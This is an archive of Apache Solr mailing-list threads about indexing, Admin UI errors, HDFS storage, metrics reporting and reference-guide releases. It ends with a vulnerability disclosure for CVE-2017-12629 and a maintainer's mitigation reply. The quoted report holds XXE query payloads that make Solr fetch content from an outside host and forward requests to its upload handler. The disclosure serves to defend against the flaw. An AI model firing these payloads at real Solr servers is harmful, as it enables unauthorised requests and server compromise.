Re: Gentle reminder RE: Object not fetched because its identifier appears to be already in processing

2018-02-27 Thread Cassandra Targett
There is not enough information here for anyone to answer. You mention a
"below message", but there is no message that we can see. If it was in an
attachment to the mail, it got stripped by the mail server.

If you want a response, please provide in the body of the mail details such
as: the error message you see (with the full stack trace, if possible);
what you are trying to index; the version of Solr you are using; any custom
configurations you may have in place; and any other detail that might help
someone who doesn't have access to your system try to guess what might be
going wrong.

Cassandra

On Tue, Feb 27, 2018 at 8:08 AM, YELESWARAPU, VENKATA BHAN <
vyeleswar...@statestreet.com> wrote:

> *Information Classification: Limited Access*
>
> If any of you experts could help, we would greatly appreciate it. Thank
> you.
>
>
>
> *From:* YELESWARAPU, VENKATA BHAN
> *Sent:* Friday, February 23, 2018 8:30 AM
> *To:* 'd...@lucene.apache.org' ; '
> solr-user@lucene.apache.org' 
> *Subject:* Object not fetched because its identifier appears to be
> already in processing
>
>
>
> *Information Classification: Limited Access*
>
> Dear Users,
>
>
>
> While indexing job is running we are seeing the below message for all the
> objects.
>
> Object not fetched because its identifier appears to be already in
> processing
>
>
>
> What is the issue and how to resolve this so that indexing can work. Could
> you please guide.
>
>
>
> Thank you,
>
> Dutt
>
>
>


ANNOUNCE: Apache Solr Reference Guide for 7.2 released

2017-12-23 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for
Solr 7.2 is now available.

This 1,157-page PDF is the definitive guide to using Apache Solr, the
search server built on Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.2.pdf

It is also available online at https://lucene.apache.org/solr/guide/7_2.

Regards,
Cassandra


Re: solrcloud in production - Jetty vs tomcat

2017-12-13 Thread Cassandra Targett
That is an old recommendation. Since Solr 5, Solr is no longer a war and
Tomcat is not supported. With modern Solr, you have only the one choice of
going to production with Jetty and there are hundreds (thousands maybe?) of
Solr implementations that do so. Jetty is now considered an "implementation
detail" that you shouldn't need to worry about to effectively run Solr for
yourself or your organization.

For more information on the war change, see also
https://wiki.apache.org/solr/WhyNoWar.

On Wed, Dec 13, 2017 at 9:01 AM, Hari Baskar <
contacthar...@yahoo.com.invalid> wrote:

> We are setting up solrcloud 6.6 in production. In some blogs, I see that
> Jetty is not recommended in prod environment. Is that the case ? Any
> specific disadvantages of going with Jetty ?
>
> Sent from Yahoo Mail on Android


Re: indexing XML stored on HDFS

2017-12-08 Thread Cassandra Targett
Matthew,

The hadoop-solr project you mention would give you the ability to index
files in HDFS. It's a Job Jar, so you submit it to Hadoop with the params
you need and it processes the files and sends them to Solr. It might not be
the fastest thing in the world since it uses MapReduce but we (I work at
Lucidworks) do have a number of people using it.

However, you mention that you're already processing your files with Spark,
and you don't really need them in HDFS in the long run - have you seen the
Spark-Solr project at https://github.com/lucidworks/spark-solr/? It has an
RDD for indexing docs to Solr, so you would be able to get the files from
wherever they originate, transform them in Spark, and get them into Solr.
It might be a better solution for your existing workflow.
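
As a very rough sketch of what the write side can look like (this uses the
DataFrame writer rather than the lower-level RDD helpers; it assumes the
spark-solr jar is on your classpath, a collection named "mycollection",
ZooKeeper at localhost:9983, and "transformedDf" being whatever DataFrame
your XSLT step produces - option names can vary a bit by version):

// Scala, inside an existing SparkSession/job
val options = Map(
  "zkhost" -> "localhost:9983",    // placeholder ZooKeeper connection string
  "collection" -> "mycollection"   // placeholder collection name
)
transformedDf.write
  .format("solr")
  .options(options)
  .mode("overwrite")
  .save()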

Hope it helps -
Cassandra

On Thu, Dec 7, 2017 at 9:03 AM, Matthew Roth  wrote:

> Yes the post tool would also be an acceptable option and one I am familiar
> with. However, I also am not seeing exactly how I would query hdfs. The
> hadoop-solr [0
> ] tool by
> lucidworks looks the most promising. I have a meeting to attend to shortly,
> and maybe I can explore that further in the afternoon.
>
> I also would like to look further into solrj. I have no real reason to
> store the results of the XSL transformation anywhere other than solr. I am
> simply not familiar with it. But on the surface it seems like it might be
> the most performant way to handle this problem.
>
> If I do pursue this with solrj and spark will solr handle multiple solrj
> connections all trying to add documents?
>
> [0] https://github.com/lucidworks/hadoop-solr/wiki/IngestMappers
>
> On Wed, Dec 6, 2017 at 5:36 PM, Erick Erickson 
> wrote:
>
> > Perhaps the bin/post tool? See:
> > https://lucidworks.com/2015/08/04/solr-5-new-binpost-utility/
> >
> > On Wed, Dec 6, 2017 at 2:05 PM, Matthew Roth  wrote:
> > > Hi All,
> > >
> > > Is there a DIH for HDFS? I see this old feature request [0
> > > ] that never seems to
> > have
> > > gone anywhere. Google searches and searches on this list don't get me
> to
> > > far.
> > >
> > > Essentially my workflow is that I have many thousands of XML documents
> > > stored in hdfs. I run an xslt transformation in spark [1
> > > ]. This transforms
> > to
> > > the expected solr input of <add><doc>...</doc></add>. This is then
> > > written back to hdfs. Now how do I get it back to solr? I
> > suppose
> > > I could move the data back to the local fs, but on the surface that
> feels
> > > like the wrong way.
> > >
> > > I don't need to store the documents in HDFS after the spark
> > transformation,
> > > I wonder if I can write them using solrj. However, I am not really
> > familiar
> > > with solrj. I am also running a single node. Most of the material I
> have
> > > read on spark-solr expects you to be running SolrCloud.
> > >
> > > Best,
> > > Matt
> > >
> > >
> > >
> > > [0] https://issues.apache.org/jira/browse/SOLR-2096
> > > [1] https://github.com/elsevierlabs-os/spark-xml-utils
> >
>


Re: [WARNING: DropBox links may be malicious.] Re: Admin Console Question

2017-11-15 Thread Cassandra Targett
So, from looking at those errors + a bit of Googling, it's complaining that
there are duplicate values in the Args list:

- Repeater: arg in commandLineArgs, Duplicate key:
string:-XX:+UseGCLogFileRotation,
Duplicate
value: -XX:+UseGCLogFileRotation
- Repeater: arg in commandLineArgs, Duplicate key: string:-Xss256k,
Duplicate value: -Xss256k

This tells us a bit about what is happening (the UI finds duplicates in the
arguments), but not why you are the only one who sees this.

From what I understand, all the UI does is make a call to
http://localhost:8983/solr/admin/info/system and parse the JSON response in
various ways. The Args section comes from the "jvm.jmx.commandLineArgs"
section of that. Somewhere maybe that data is being requested twice and
making a duplicate set of data for the UI to parse?

What do you see when you make a direct call to those stats (
http://localhost:8983/solr/admin/info/system) in your browser? Are they
duplicated? Any errors in the logs?
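
For example (adjust host/port for your install):

curl "http://localhost:8983/solr/admin/info/system?wt=json"

and look at the "jvm" > "jmx" > "commandLineArgs" array in the response to
see whether those two arguments really are listed twice.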

Unfortunately, these are only clues - maybe they will help someone take
this a step further. If you can, you may also try another browser to see if
it occurs there also.

On Wed, Nov 15, 2017 at 9:40 AM, Webster Homer 
wrote:

> I found that my boss's solr admin console did display the Args the only
> install I have that does...
> I do see errors in both Consoles. I see more errors on the ones that don't
> display Args
> Here are the errors that only show up when Args doesn't:
> Error: [ngRepeat:dupes] Duplicates in a repeater are not allowed. Use
> 'track by' expression to specify unique keys. Repeater: arg in
> commandLineArgs, Duplicate key: string:-XX:+UseGCLogFileRotation,
> Duplicate
> value: -XX:+UseGCLogFileRotation
> http://errors.angularjs.org/1.3.8/ngRepeat/dupes?p0=arg%
> 20in%20commandLineArgs=string%3A-XX%3A%2BUseGCLogFileRotation=-XX%
> 3A%2BUseGCLogFileRotation
> at angular.js:86
> at ngRepeatAction (angular.js:24506)
> at Object.$watchCollectionAction [as fn] (angular.js:14115)
> at Scope.$digest (angular.js:14248)
> at Scope.$apply (angular.js:14511)
> at done (angular.js:9669)
> at completeRequest (angular.js:9859)
> at XMLHttpRequest.requestLoaded (angular.js:9800)
> (anonymous) @ angular.js:11617
>
>
> This is all of the errors I see when loading the page. Most of these show
> up when loading the page
>
> angular.js:11617 TypeError: Cannot read property 'default_text' of
> undefined
> at initOrUpdate (angular-chosen.js:80)
> at NgModelController.ngModel.$render (angular-chosen.js:95)
> at Object.ngModelWatch (angular.js:20998)
> at Scope.$digest (angular.js:14240)
> at Scope.$apply (angular.js:14511)
> at bootstrapApply (angular.js:1472)
> at Object.invoke (angular.js:4205)
> at doBootstrap (angular.js:1470)
> at bootstrap (angular.js:1490)
> at angularInit (angular.js:1384)
> (anonymous) @ angular.js:11617
> (anonymous) @ angular.js:8567
> $digest @ angular.js:14266
> $apply @ angular.js:14511
> bootstrapApply @ angular.js:1472
> invoke @ angular.js:4205
> doBootstrap @ angular.js:1470
> bootstrap @ angular.js:1490
> angularInit @ angular.js:1384
> (anonymous) @ angular.js:26088
> j @ jquery-2.1.3.min.js:27
> fireWith @ jquery-2.1.3.min.js:27
> ready @ jquery-2.1.3.min.js:27
> I @ jquery-2.1.3.min.js:27
> 2angular.js:11617 TypeError: Cannot read property 'results_none_found' of
> undefined
> at disableWithMessage (angular-chosen.js:89)
> at angular-chosen.js:123
> at angular.js:16228
> at completeOutstandingRequest (angular.js:4925)
> at angular.js:5305
> (anonymous) @ angular.js:11617
> (anonymous) @ angular.js:8567
> (anonymous) @ angular.js:16231
> completeOutstandingRequest @ angular.js:4925
> (anonymous) @ angular.js:5305
> setTimeout (async)
> Browser.self.defer @ angular.js:5303
> timeout @ angular.js:16226
> (anonymous) @ angular-chosen.js:114
> $watchCollectionAction @ angular.js:14113
> $digest @ angular.js:14248
> $apply @ angular.js:14511
> bootstrapApply @ angular.js:1472
> invoke @ angular.js:4205
> doBootstrap @ angular.js:1470
> bootstrap @ angular.js:1490
> angularInit @ angular.js:1384
> (anonymous) @ angular.js:26088
> j @ jquery-2.1.3.min.js:27
> fireWith @ jquery-2.1.3.min.js:27
> ready @ jquery-2.1.3.min.js:27
> I @ jquery-2.1.3.min.js:27
> ngtimeago.js:92 about 17 hoursago
> angular.js:11617 Error: [ngRepeat:dupes] Duplicates in a repeater are not
> allowed. Use 'track by' expression to specify unique keys. Repeater: arg in
> commandLineArgs, Duplicate key: string:-Xss256k, Duplicate value: -Xss256k
> http://errors.angularjs.org/1.3.8/ngRepeat/dupes?p0=arg%
> 20in%20commandLineArgs=string%3A-Xss256k=-Xss256k
> at angular.js:86
> at ngRepeatAction (angular.js:24506)
> at Object.$watchCollectionAction [as fn] (angular.js:14115)
> at Scope.$digest (angular.js:14248)
> at Scope.$apply (angular.js:14511)
> at done (angular.js:9669)
> at completeRequest 

Re: Admin Console Question

2017-11-14 Thread Cassandra Targett
I just started 7.1 and see the Args section populated and I don't recall
any issue that intended to modify the prior behavior.

Can you describe how you're starting?

On Tue, Nov 14, 2017 at 9:33 AM, Webster Homer 
wrote:

> We're in the process of upgrading to Solr 7.1. I noticed that the 7.1 Admin
> Dashboard in the Console no longer displays the Args section showing all
> the startup parameters. Instead I just see "Arg" with nothing next to it.
> This has been quite useful as we don't have access to the startup scripts
> in production (or even QA) it allowed me to at a glance see what the
> parameters were.
>
> How do I enable this display in 7.1? In 6.* it was just there out of the
> box.
>
> Thanks
>
> --
>
>
> This message and any attachment are confidential and may be privileged or
> otherwise protected from disclosure. If you are not the intended recipient,
> you must not copy this message or attachment or disclose the contents to
> any other person. If you have received this transmission in error, please
> notify the sender immediately and delete the message and any attachment
> from your system. Merck KGaA, Darmstadt, Germany and any of its
> subsidiaries do not accept liability for any omissions or errors in this
> message which may arise as a result of E-Mail-transmission or for damages
> resulting from any unauthorized changes of the content of this message and
> any attachment thereto. Merck KGaA, Darmstadt, Germany and any of its
> subsidiaries do not guarantee that this message is free of viruses and does
> not accept liability for any damages caused by any virus transmitted
> therewith.
>
> Click http://www.emdgroup.com/disclaimer to access the German, French,
> Spanish and Portuguese versions of this disclaimer.
>


Re: Solr / HDPSearch related

2017-11-10 Thread Cassandra Targett
Some of these questions should be directed to Hortonworks, but I'm glad you
posted them here because I noticed you asked similar questions on the IRC
channel but left before I could jump in and help. Full disclosure, I work
for Lucidworks and one of my jobs is managing the development team that
makes HDP Search.

The HDP Search package is an official release of Solr plus some connectors
and development kits that allow you to index content either stored in or
accessed by common Hadoop components (namely, HDFS, Hive, HBase, Spark, and
Storm), and with an Ambari integration for managing Solr. It has ALL of the
features of each Solr release - when we build HDP Search we download Solr
from archive.apache.org and not any kind of clone or forked repo - so if
you can do it with Solr you download outside of that package, you can do it
with the Solr in that package.

To answer your specific questions:

- There are cases where it's more performant to store indexes on the local
filesystem than to use HDFS, but I think it would only be a dramatic
difference if you have a high query rate (others may disagree with this
assessment). As for why someone would do this...if you have 20 half-empty
servers already allocated for HDFS, you probably don't want 5 more for
Solr. You could just use the distributed filesystem you have.

- When the indexes are stored in HDFS, you can absolutely update documents.
In this respect it's really not all that different from a local filesystem.
If you want a bit more information about this, see the Solr Ref Guide:
https://lucene.apache.org/solr/guide/running-solr-on-hdfs.html
(a bare-bones config sketch is included after this list)

- You should discuss the license options with Hortonworks. I believe they
charge separately for HDP Search, but I do not know the details or numbers
(I just manage the dev, not the business ;-) ).

- The integration with Ambari doesn't care about where the indexes are -
they can be on HDFS or locally. It's part of the setup of Solr via Ambari
to decide where the indexes will go. I will say the integration with Ambari
isn't very deep - you can monitor the state of Solr on each node (is it
running or not, basically), but besides a few config options you'll still
use the Solr Admin UI for most Solr-related tasks. In the most recent
releases for HDP 2.6, we added alerting in case Solr is down on any node,
and Solr's metrics are stored in the Ambari Metrics System with a few
Grafana dashboards for monitoring load, etc.
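
As mentioned above, the solrconfig.xml side of HDFS-backed indexes is fairly
small. A bare-bones sketch (the namenode address and paths are placeholders;
the Running Solr on HDFS page linked earlier covers the full set of options):

<directoryFactory name="DirectoryFactory" class="solr.HdfsDirectoryFactory">
  <str name="solr.hdfs.home">hdfs://namenode:8020/solr</str>
  <str name="solr.hdfs.confdir">/etc/hadoop/conf</str>
</directoryFactory>

plus <lockType>hdfs</lockType> in the <indexConfig> section.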

Documentation for HDP Search is available at:
https://doc.lucidworks.com/lucidworks-hdpsearch/2.6/index.html if you're
interested in more detail, including screenshots of the Ambari config
options.

Hope this helps clear things up for you -

Cassandra

On Fri, Nov 10, 2017 at 10:08 AM, Greenhorn Techie <
greenhorntec...@gmail.com> wrote:

> Hi,
>
> We have a HDP product cluster and are now planning to build a search
> solution for some of our business requirements. In this regard, I have the
> following questions. Can you please answer the below questions with respect
> to Solr?
>
>- As I understand, it is more performant to have SolrCloud set-up to use
>local storage instead of HDFS for storing the indexes. If so, what are
> the
>use-cases where SolrCloud would store index in HDFS?
>- Also, if the indexes are stored in HDFS, will it be possible to update
>the documents stored in Solr in that case?
>- Will HDP Search be supported as part of HDP support license itself or
>does it need additional license?
>- If SolrCloud is configured to use local storage, can it still be
>managed through Ambari? What aspects of SolrCloud might not be available
>through Ambari? Monitoring?
>
> Just to provide more context, our data to be indexed is not in HDP at the
> moment and would come from external sources.
>
> Thanks
>


Re: Issues with Graphite reporter config

2017-11-07 Thread Cassandra Targett
I believe this is https://issues.apache.org/jira/browse/SOLR-11413,
which has a fix already slated for Solr 7.2.

On Tue, Nov 7, 2017 at 10:44 AM, sudershan madhavan
 wrote:
> Hi,
> I am running Solrcloud version: 6.6.1
> I have been trying to use graphite to report solr metrics and seem to get
> the below error while doing so in the solr logs:
>>
>> java.lang.NullPointerException
>> at
>> com.codahale.metrics.graphite.PickledGraphite.pickleMetrics(PickledGraphite.java:313)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.writeMetrics(PickledGraphite.java:255)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.send(PickledGraphite.java:213)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.reportGauge(GraphiteReporter.java:345)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.report(GraphiteReporter.java:243)
>> at
>> com.codahale.metrics.ScheduledReporter.report(ScheduledReporter.java:251)
>> at
>> com.codahale.metrics.ScheduledReporter$1.run(ScheduledReporter.java:174)
>> at
>> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>> at
>> java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294)
>> at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>> at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>> at java.lang.Thread.run(Thread.java:745)
>> 2017-11-07 15:28:47.543 WARN  (metrics-graphite-reporter-3-thread-1) [   ]
>> c.c.m.g.GraphiteReporter Unable to report to Graphite
>> java.net.SocketException: Socket closed
>> at
>> java.net.SocketOutputStream.socketWrite(SocketOutputStream.java:118)
>> at java.net.SocketOutputStream.write(SocketOutputStream.java:143)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.writeMetrics(PickledGraphite.java:261)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.send(PickledGraphite.java:213)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.sendIfEnabled(GraphiteReporter.java:328)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.reportTimer(GraphiteReporter.java:288)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.report(GraphiteReporter.java:259)
>> at
>> com.codahale.metrics.ScheduledReporter.report(ScheduledReporter.java:251)
>> at
>> com.codahale.metrics.ScheduledReporter$1.run(ScheduledReporter.java:174)
>> at
>> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>> at
>> java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294)
>> at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>> at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>> at java.lang.Thread.run(Thread.java:745)
>> 2017-11-07 15:28:47.543 ERROR (metrics-graphite-reporter-1-thread-1) [   ]
>> c.c.m.ScheduledReporter Exception thrown from GraphiteReporter#report.
>> Exception was suppressed.
>> java.lang.NullPointerException
>> at java.util.LinkedList$ListItr.next(LinkedList.java:893)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.pickleMetrics(PickledGraphite.java:305)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.writeMetrics(PickledGraphite.java:255)
>> at
>> com.codahale.metrics.graphite.PickledGraphite.send(PickledGraphite.java:213)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.sendIfEnabled(GraphiteReporter.java:328)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.reportMetered(GraphiteReporter.java:304)
>> at
>> com.codahale.metrics.graphite.GraphiteReporter.report(GraphiteReporter.java:255)
>> at
>> com.codahale.metrics.ScheduledReporter.report(ScheduledReporter.java:251)
>> at
>> com.codahale.metrics.ScheduledReporter$1.run(ScheduledReporter.java:174)
>> at
>> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>> at
>> java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180)
>> at
>> java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294)
>> at

ANNOUNCE: Solr Reference Guide for Solr 7.1 released

2017-11-02 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for 7.1 is now available.

This 1,077-page PDF is the definitive guide to using Apache Solr, the
search server built on Lucene.

The PDF Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.1.pdf.

It is also available online at https://lucene.apache.org/solr/guide/7_1.

New in this version of the Guide is documentation for the new features
released in Solr 7.1. In addition, we have reorganized the main
sections a bit, adding a new section "Deployment and Operations" where
information for operational management of Solr (such as the location
of major config files, how to go to production, running on HDFS, etc.)
now resides. We intend to add more to this section in future releases.

Regards,
Cassandra


Re: solr 7.0.1: exception running post to crawl simple website

2017-10-27 Thread Cassandra Targett
Toby,

Your mention of "-recursive" causing a problem reminded me of a simple
crawl (of the 7.0 Ref Guide) using bin/post I was trying to get to
work the other day and couldn't.

The order of the parameters seems to make a difference with what error
you get (this is using 7.1):

1. "./bin/post -c gettingstarted -delay 10
https://lucene.apache.org/solr/guide/7_0 -recursive"

yields the stack trace in the previous message:

POSTed web resource https://lucene.apache.org/solr/guide/7_0 (depth: 0)
[Fatal Error] :1:1: Content is not allowed in prolog.
Exception in thread "main" java.lang.RuntimeException:
org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 1; Content
is not allowed in prolog.
at 
org.apache.solr.util.SimplePostTool$PageFetcher.getLinksFromWebPage(SimplePostTool.java:1252)
at org.apache.solr.util.SimplePostTool.webCrawl(SimplePostTool.java:616)
at org.apache.solr.util.SimplePostTool.postWebPages(SimplePostTool.java:563)
at org.apache.solr.util.SimplePostTool.doWebMode(SimplePostTool.java:365)
at org.apache.solr.util.SimplePostTool.execute(SimplePostTool.java:187)
at org.apache.solr.util.SimplePostTool.main(SimplePostTool.java:172)
Caused by: org.xml.sax.SAXParseException; lineNumber: 1; columnNumber:
1; Content is not allowed in prolog.
at 
com.sun.org.apache.xerces.internal.parsers.DOMParser.parse(DOMParser.java:257)
at 
com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderImpl.parse(DocumentBuilderImpl.java:339)
at javax.xml.parsers.DocumentBuilder.parse(DocumentBuilder.java:121)
at org.apache.solr.util.SimplePostTool.makeDom(SimplePostTool.java:1061)
at 
org.apache.solr.util.SimplePostTool$PageFetcher.getLinksFromWebPage(SimplePostTool.java:1232)
... 5 more

2. "./bin/post -c gettingstarted -delay 10 -recursive
https://lucene.apache.org/solr/guide/7_0"

yields:

No files, directories, URLs, -d strings, or stdin were specified.

See './bin/post -h' for usage instructions.

3. "./bin/post -c gettingstarted
http://lucene.apache.org/solr/guide/7_0 -recursive -delay 10"

yields:

Unrecognized argument: 10

If this was intended to be a data file, it does not exist relative to
/Applications/Solr/solr-7.1.0

4. "./bin/post -c gettingstarted -delay 10
https://lucene.apache.org/solr/guide/7_0"

successfully gets the document, but only the single page at that URL.
It does not extract any of the content of the page besides the title
and metadata Tika adds.

I'd say we should probably file a JIRA for it. If the parsing is wrong
(as it seems to me to be), that's a different problem, but the fact
you can't use recursive at all is a bug AFAICT.

Cassandra

On Fri, Oct 27, 2017 at 11:03 AM, toby1851  wrote:
> Amrit Sarkar wrote
>> The above is SAXParse, runtime exception. Nothing can be done at Solr end
>> except curating your own data.
>
> I'm trying to replace a solr-4.6.0 system (which has been working
> brilliantly for 3 years!) with solr-7.1.0. I'm running into this exact same
> problem.
>
> I do not believe it is a data curation problem. (Even if it were, it's very
> unfriendly just to bomb out with a stack trace. And it's seriously annoying
> that there's a 14 line error message about a parsing problem, but it
> entirely neglects to mention what it was trying to parse! Was it a file, a
> URL...?)
>
> Anyway, the symptoms I'm seeing are that a simple "post -c foo https://..."
> works fine. But the moment I turn on recursion, it fails before fetching a
> second page. It doesn't matter what the first page is. Really: when I made
> no progress with the site that I'm actually trying to index, I tried another
> of my sites, then Google, then eBay... In every case, I get something like
> this:
>
> $ post -c mycollection https://www.ebay.co.uk -recursive 1 -delay 10
> ...
> POSTed web resource https://www.ebay.co.uk (depth: 0)
> ... [ 10s delay ]
> [Fatal Error] :1:1: Content is not allowed in prolog.
> ...
>
> I've been looking at the code, and also what's going with strace. As far as
> I can see, at the point where the exception occurs, we are parsing data (a
> copy of the page, presumably) that has come from the solr server itself.
> That appears to be a chunk of JSON with embedded XML. The inner XML does
> look to at least start correctly. The fact that we're getting an error at
> line 1 column 1 every single time makes me suspect that we're feeding the
> wrong thing to the SAX parser.
>
> Anyway, I'm going to go and look at nutch as I need something working very
> soon.
>
> But could somebody who is familiar with this code take another look?
>
> Cheers,
>
> Toby.
>
>
>
>
> --
> Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: zero-day exploit security issue

2017-10-18 Thread Cassandra Targett
The JIRA issues are now publicly viewable:

https://issues.apache.org/jira/browse/SOLR-11482
https://issues.apache.org/jira/browse/SOLR-11477



On Wed, Oct 18, 2017 at 4:49 AM, Ishan Chattopadhyaya
 wrote:
> There will be a 5.5.5 release soon. 6.6.2 has just been released.
>
> On Mon, Oct 16, 2017 at 8:17 PM, Keith L  wrote:
>
>> Additionally, it looks like the commits are public on github. Is this
>> backported to 5.5.x too? Users that are still on 5x might want to backport
>> some of the issues themselves since is not officially supported anymore.
>>
>> On Mon, Oct 16, 2017 at 10:11 AM Mike Drob  wrote:
>>
>> > Given that the already public nature of the disclosure, does it make
>> sense
>> > to make the work being done public prior to release as well?
>> >
>> > Normally security fixes are kept private while the vulnerabilities are
>> > private, but that's not the case here...
>> >
>> > On Mon, Oct 16, 2017 at 1:20 AM, Shalin Shekhar Mangar <
>> > shalinman...@gmail.com> wrote:
>> >
>> > > Yes, there is but it is private i.e. only the Apache Lucene PMC
>> > > members can see it. This is standard for all security issues in Apache
>> > > land. The fixes for this issue has been applied to the release
>> > > branches and the Solr 7.1.0 release candidate is already up for vote.
>> > > Barring any unforeseen circumstances, a 7.1.0 release with the fixes
>> > > should be expected this week.
>> > >
>> > > On Fri, Oct 13, 2017 at 8:14 PM, Xie, Sean  wrote:
>> > > > Is there a tracking to address this issue for SOLR 6.6.x and 7.x?
>> > > >
>> > > > https://lucene.apache.org/solr/news.html#12-october-
>> > > 2017-please-secure-your-apache-solr-servers-since-a-
>> > > zero-day-exploit-has-been-reported-on-a-public-mailing-list
>> > > >
>> > > > Sean
>> > > >
>> > > > Confidentiality Notice::  This email, including attachments, may
>> > include
>> > > non-public, proprietary, confidential or legally privileged
>> information.
>> > > If you are not an intended recipient or an authorized agent of an
>> > intended
>> > > recipient, you are hereby notified that any dissemination, distribution
>> > or
>> > > copying of the information contained in or transmitted with this e-mail
>> > is
>> > > unauthorized and strictly prohibited.  If you have received this email
>> in
>> > > error, please notify the sender by replying to this message and
>> > permanently
>> > > delete this e-mail, its attachments, and any copies of it immediately.
>> > You
>> > > should not retain, copy or use this e-mail or any attachment for any
>> > > purpose, nor disclose all or any part of the contents to any other
>> > person.
>> > > Thank you.
>> > >
>> > >
>> > >
>> > > --
>> > > Regards,
>> > > Shalin Shekhar Mangar.
>> > >
>> >
>>


Re: Several critical vulnerabilities discovered in Apache Solr (XXE & RCE)

2017-10-12 Thread Cassandra Targett
Michael,

On behalf of the Lucene PMC, thank you for reporting these issues. Please
be assured we are actively looking into them and are working to provide
resolutions as soon as possible. Somehow no one in the Lucene/Solr
community saw your earlier mail so we have an unfortunate delay in reacting
to this report.

This has been assigned a public CVE (CVE-2017-12629) which we will
reference in future communication about resolution and mitigation steps.

For everyone following this thread, here is what we're doing now:

* Until fixes are available, all Solr users are advised to restart their
Solr instances with the system parameter `-Ddisable.configEdit=true` (an
example start command is shown after this list). This
will disallow any changes to be made to configurations via the Config API.
This is a key factor in this vulnerability, since it allows GET requests to
add the RunExecutableListener to the config.
** This is sufficient to protect you from this type of attack, but means
you cannot use the edit capabilities of the Config API until the other
fixes described below are in place.

* A new release of Lucene/Solr was in the vote phase, but we have now
pulled it back to be able to address these issues in the upcoming 7.1
release. We will also determine mitigation steps for users on earlier
versions, which may include a 6.6.2 release for users still on 6.x.

* The RunExecutableListener will be removed in 7.1. It was previously used
by Solr for index replication but has been replaced and is no longer needed.

* The XML Parser will be fixed and the fixes will be included in the 7.1
release.

* The 7.1 release was already slated to include a change to disable the
`stream.body` parameter by default, which will further help protect systems.
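
To be concrete about the first item above, one way to apply the mitigation
with the standard start script (add whatever flags you normally start with,
such as -c, -z, or -p; putting the property in SOLR_OPTS in solr.in.sh works
as well):

bin/solr stop -all
bin/solr start -Ddisable.configEdit=true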

We hope you are unable to find any vulnerabilities in the future, but, for
the record, the ASF policy for reporting these types of issues is to email
them to secur...@apache.org only. This is to prevent vulnerabilities from
getting out into the public before fixes can be identified so we avoid
exposing our community to attacks by malicious actors. More information on
these policies is available from the Security Team's website:
https://www.apache.org/security/.

We will have more information shortly about the timing of the 7.1 release
as well as ways for pre-7.0 users to gain access to the fixes for their
versions.

Best,
Cassandra


On Thu, Oct 12, 2017 at 7:16 AM, Michael Stepankin 
wrote:

> Hello,
>
> Could you look at this please. It’s a bit important.
>
> On Fri, 22 Sep 2017 at 01:15, Michael Stepankin 
> wrote:
>
>> Hello
>>
>> We would like to report two important vulnerabilities in the latest
>> Apache Solr distribution. Both of them have critical risk rating and they
>> could be chained together in order to compromise the running Solr server
>> even from unprivileged external attacker.
>>
>> *First Vulnerability: XML External Entity Expansion (deftype=xmlparser) *
>>
>> Lucene includes a query parser that is able to create the full-spectrum
>> of Lucene queries, using an XML data structure. Starting from version 5.1
>> Solr supports "xml" query parser in the search query.
>>
>> The problem is that lucene xml parser does not explicitly prohibit
>> doctype declaration and expansion of external entities. It is possible to
>> include special entities in the xml document, that point to external files
>> (via file://) or external urls (via http://):
>>
>> Example usage: http://localhost:8983/solr/gettingstarted/select?q={!
>> xmlparser v='http://xxx.s.artsploit.com/xxx
>> "'>'}
>>
>> When Solr is parsing this request, it makes a HTTP request to
>> http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE
>> definition.
>>
>> Considering that we can define parser type in the search query, which is
>> very often comes from untrusted user input, e.g. search fields on websites.
>> It allows to an external attacker to make arbitrary HTTP requests to the
>> local SOLR instance and to bypass all firewall restrictions.
>>
>> For example, this vulnerability could be user to send malicious data to
>> the '/upload' handler:
>>
>> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser
>> v='http://xxx.s.artsploit.com/
>> solr/gettingstarted/upload?stream.body={"xx":"yy"}&
>> commit=true"'>'}
>>
>> This vulnerability can also be exploited as Blind XXE using ftp wrapper
